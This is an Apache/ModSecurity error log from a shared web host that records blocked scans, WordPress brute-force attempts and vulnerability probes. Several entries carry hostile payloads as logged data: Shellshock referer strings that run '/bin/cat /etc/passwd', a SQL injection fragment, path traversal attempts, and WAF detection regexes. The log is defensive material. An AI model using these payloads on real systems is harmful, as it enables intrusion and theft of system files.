[Tue May 26 12:50:55.246584 2026] [security2:error] [pid 448967:tid 449135] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ1uXLPuWQsfM-UVS9RQAAACY"]
[Tue May 26 12:50:56.285569 2026] [security2:error] [pid 448967:tid 449203] [client 195.178.110.34:48038] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/.svn/wc.db"] [unique_id "ahVJ2OXLPuWQsfM-UVS9ZAAAAGo"]
[Tue May 26 12:50:56.720911 2026] [autoindex:error] [pid 448967:tid 449150] [client 34.72.176.129:24883] AH01276: Cannot serve directory /home1/micro3e1/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:50:57.955238 2026] [security2:error] [pid 448967:tid 449144] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ2eXLPuWQsfM-UVS9gQAAAC8"]
[Tue May 26 12:50:59.322281 2026] [security2:error] [pid 448967:tid 449102] [client 195.178.110.34:48038] ModSecurity: Access denied with code 406 (phase 2). Match of "rx [.](png|jpeg|jpg|tiff|bmp|gif|webp|heif|svg|raw|ico|ppm|pgm|pbm|exr|nef|dng|cr2|orf|arw|pef|sr2|raf|kdc|indd|ai|eps|pdf|psd|tga|hdr|j2k|jpf|jp2|pspimage|cut|icns|webm|bpg|avif|heic|fpx|hdri|hdp|yuv|sgi|xpm|svgz)$" against "REQUEST_FILENAME" required. [file "/opt/mod_security/hg_rules.conf"] [line "842"] [id "900095"] [msg "Bad UA :: Fake Mozilla Agent"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/.svn/entries"] [unique_id "ahVJ2-XLPuWQsfM-UVS9sAAAAAU"]
[Tue May 26 12:51:00.176877 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:53049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ3OXLPuWQsfM-UVS9wAAAAA0"]
[Tue May 26 12:51:00.177053 2026] [security2:error] [pid 448967:tid 449110] [client 157.20.138.61:53049] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ3OXLPuWQsfM-UVS9wAAAAA0"]
[Tue May 26 12:51:00.943524 2026] [security2:error] [pid 448967:tid 449121] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ3OXLPuWQsfM-UVS9zAAAABg"]
[Tue May 26 12:51:03.707140 2026] [security2:error] [pid 448967:tid 449146] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ3-XLPuWQsfM-UVS-KQAAADE"]
[Tue May 26 12:51:04.043658 2026] [security2:error] [pid 448967:tid 449102] [client 78.46.215.1:17332] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahVJ3-XLPuWQsfM-UVS-LQAAAAU"], referer: https://thegoodsporting.com
[Tue May 26 12:51:05.098665 2026] [core:error] [pid 448967:tid 449211] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:05.098703 2026] [core:error] [pid 448967:tid 449211] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:05.098821 2026] [security2:error] [pid 448967:tid 449211] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVJ4eXLPuWQsfM-UVS-XQAAAHI"]
[Tue May 26 12:51:05.099460 2026] [security2:error] [pid 448967:tid 449178] [client 195.178.110.34:51660] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVJ4eXLPuWQsfM-UVS-WgAAAFE"]
[Tue May 26 12:51:05.903072 2026] [security2:error] [pid 448967:tid 449098] [client 74.7.230.32:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.juniorwoodies.glorodavionics.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVJ4eXLPuWQsfM-UVS-dAAAAAE"]
[Tue May 26 12:51:05.917936 2026] [security2:error] [pid 448967:tid 449223] [client 74.7.230.32:40860] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.juniorwoodies.glorodavionics.com"] [uri "/robots.txt"] [unique_id "ahVJ4eXLPuWQsfM-UVS-cAAAfiw"]
[Tue May 26 12:51:06.491976 2026] [security2:error] [pid 448967:tid 449196] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ4uXLPuWQsfM-UVS-egAAAGM"]
[Tue May 26 12:51:09.182039 2026] [security2:error] [pid 448967:tid 449121] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ5OXLPuWQsfM-UVS-uAAAABg"]
[Tue May 26 12:51:10.559493 2026] [security2:error] [pid 448967:tid 449213] [client 23.94.40.119:34730] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/seeyon/htmlofficeservlet"] [unique_id "ahVJ5uXLPuWQsfM-UVS-7AAAAHQ"]
[Tue May 26 12:51:10.597817 2026] [security2:error] [pid 448967:tid 449147] [client 23.94.40.119:34698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:ostype. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:ostype"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/vpn/user/download/client"] [unique_id "ahVJ5uXLPuWQsfM-UVS-9QAAADI"]
[Tue May 26 12:51:10.599040 2026] [security2:error] [pid 448967:tid 449123] [client 23.94.40.119:34680] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:fileNames[]. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:fileNames[]"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/export/classroom-course-statistics"] [unique_id "ahVJ5uXLPuWQsfM-UVS-9gAAABo"]
[Tue May 26 12:51:10.619780 2026] [security2:error] [pid 448967:tid 449115] [client 23.94.40.119:34738] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/general/index/UploadFile.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-7QAAABI"]
[Tue May 26 12:51:10.619904 2026] [security2:error] [pid 448967:tid 449157] [client 23.94.40.119:34772] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/scripts/setup.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-8AAAADw"]
[Tue May 26 12:51:10.637763 2026] [security2:error] [pid 448967:tid 449212] [client 23.94.40.119:34580] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/public/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS--AAAAHM"]
[Tue May 26 12:51:10.638227 2026] [security2:error] [pid 448967:tid 449102] [client 23.94.40.119:34626] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/weaver/org.apache.xmlrpc.webserver.XmlRpcServlet"] [unique_id "ahVJ5uXLPuWQsfM-UVS--wAAAAU"]
[Tue May 26 12:51:10.638257 2026] [security2:error] [pid 448967:tid 449182] [client 23.94.40.119:34596] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php/User/doLogin"] [unique_id "ahVJ5uXLPuWQsfM-UVS--gAAAFU"]
[Tue May 26 12:51:10.640191 2026] [security2:error] [pid 448967:tid 449223] [client 23.94.40.119:34650] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/dataSetParam/verification;swagger-ui/"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AAAAAH4"]
[Tue May 26 12:51:10.640230 2026] [security2:error] [pid 448967:tid 449098] [client 23.94.40.119:34612] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:lang. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:lang"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ5uXLPuWQsfM-UVS-_AAAAAE"]
[Tue May 26 12:51:10.641270 2026] [security2:error] [pid 448967:tid 449107] [client 23.94.40.119:34776] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-6wAAAAo"]
[Tue May 26 12:51:10.641435 2026] [security2:error] [pid 448967:tid 449185] [client 23.94.40.119:34648] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:(?:truncate|truncate|rename)[[:space:]]+[a-z| |0-9|\\\\*|\\\\.|\\\\,|\\\\(|\\\\)|_|\\\\-]+[[:space:]]+(?:into|from|table|database|index|view)[[:space:]]+[a-z|0-9|\\\\*| |\\\\{|\\\\.|\\\\,|\\\\(|\\\\)|_|\\\\-]|\\\\bunion\\\\b.{1,256}?select.{1,256}[a-z0-9\\\\(\\\\)].{1,256}(?:from|#| ..." at ARGS:id. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "296"] [id "340016"] [rev "46"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  SQL injection attempt detected"] [data "union select md5(999999999) as id from"] [severity "CRITICAL"] [tag "SQLi"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/upgrade/detail.jsp/login/LoginSSO.jsp"] [unique_id "ahVJ5uXLPuWQsfM-UVS-_wAAAFg"]
[Tue May 26 12:51:10.649834 2026] [security2:error] [pid 448967:tid 449135] [client 23.94.40.119:34788] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS-8QAAACY"]
[Tue May 26 12:51:10.737734 2026] [core:error] [pid 448967:tid 449119] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:10.737765 2026] [core:error] [pid 448967:tid 449119] [client 195.178.110.34:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 12:51:10.737917 2026] [security2:error] [pid 448967:tid 449119] [client 195.178.110.34:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/index.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS_BAAAABY"]
[Tue May 26 12:51:10.738686 2026] [security2:error] [pid 448967:tid 449195] [client 195.178.110.34:51666] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "cpanel.canopykaapi.com"] [uri "/___proxy_subdomain_cpanel/"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AQAAAGI"]
[Tue May 26 12:51:10.754679 2026] [security2:error] [pid 448967:tid 449144] [client 23.94.40.119:34814] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/zentao/user-login.html"] [unique_id "ahVJ5uXLPuWQsfM-UVS_CAAAAC8"], referer: https://www.madrasbarassociation.org.in.svijaykumar.in/zentao/user-login.html
[Tue May 26 12:51:10.880061 2026] [security2:error] [pid 448967:tid 449206] [client 157.20.138.61:53406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AwAAAG0"]
[Tue May 26 12:51:10.880321 2026] [security2:error] [pid 448967:tid 449206] [client 157.20.138.61:53406] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVJ5uXLPuWQsfM-UVS_AwAAAG0"]
[Tue May 26 12:51:11.103531 2026] [security2:error] [pid 448967:tid 449127] [client 23.94.40.119:34796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/index.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_DwAAAB4"]
[Tue May 26 12:51:11.658067 2026] [security2:error] [pid 448967:tid 449222] [client 23.94.40.119:34844] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/lcms/index.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_JQAAAH0"]
[Tue May 26 12:51:11.658506 2026] [security2:error] [pid 448967:tid 449219] [client 23.94.40.119:34826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/images/logo/logo-eoffice.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_JgAAAHo"]
[Tue May 26 12:51:11.828312 2026] [security2:error] [pid 448967:tid 449030] [remote 45.55.33.147:50810] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.33.55.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_JAAAcz4"]
[Tue May 26 12:51:12.003295 2026] [security2:error] [pid 448967:tid 449111] [client 23.94.40.119:34884] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at ARGS:lang. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "198"] [id "340007"] [rev "47"] [msg "Atomicorp.com WAF Rules: Generic Path Recursion denied"] [data "/../,ARGS:lang"] [severity "CRITICAL"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6OXLPuWQsfM-UVS_LQAAAA4"]
[Tue May 26 12:51:12.025949 2026] [security2:error] [pid 448967:tid 449134] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVJ5-XLPuWQsfM-UVS_IgAAACU"]
[Tue May 26 12:51:12.892431 2026] [security2:error] [pid 448967:tid 449025] [remote 84.247.129.9:57312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 9.129.247.84.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVJ6OXLPuWQsfM-UVS_PgAACzk"]
[Tue May 26 12:51:13.230902 2026] [security2:error] [pid 448967:tid 449050] [remote 167.172.25.98:55506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 98.25.172.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_RgAAdlI"]
[Tue May 26 12:51:13.434024 2026] [security2:error] [pid 448967:tid 449129] [client 23.94.40.119:34966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/guest_auth/guestIsUp.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_VAAAACA"]
[Tue May 26 12:51:13.434175 2026] [security2:error] [pid 448967:tid 449129] [client 23.94.40.119:34966] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/guest_auth/guestIsUp.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_VAAAACA"]
[Tue May 26 12:51:13.572933 2026] [security2:error] [pid 448967:tid 449148] [client 23.94.40.119:34988] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx"] [unique_id "ahVJ6eXLPuWQsfM-UVS_WQAAADM"]
[Tue May 26 12:51:13.645418 2026] [security2:error] [pid 448967:tid 449135] [client 23.94.40.119:35004] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.40.94.23.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/backupmgt/localJob.php"] [unique_id "ahVJ6eXLPuWQsfM-UVS_XAAAACY"]
[Tue May 26 12:51:13.874771 2026] [security2:error] [pid 448967:tid 449195] [client 23.94.40.119:35020] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6eXLPuWQsfM-UVS_YwAAAGI"]
[Tue May 26 12:51:14.226889 2026] [security2:error] [pid 448967:tid 449206] [client 23.94.40.119:35068] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_bQAAAG0"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.235312 2026] [security2:error] [pid 448967:tid 449105] [client 23.94.40.119:35036] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/"] [unique_id "ahVJ6uXLPuWQsfM-UVS_bgAAAAg"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
[Tue May 26 12:51:14.384527 2026] [security2:error] [pid 448967:tid 449193] [client 23.94.40.119:35092] ModSecurity: Access denied with code 406 (phase 1). Pattern match "\\\\(\\\\) \\\\{" at REQUEST_HEADERS:Cookie. [file "/opt/mod_security/hg_rules.conf"] [line "128"] [id "900261"] [msg "CVE-2014-6271 - Bash Attack"] [hostname "www.madrasbarassociation.org.in.svijaykumar.in"] [uri "/cgi-bin/test-cgi"] [unique_id "ahVJ6uXLPuWQsfM-UVS_cgAAAGA"], referer: () { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd
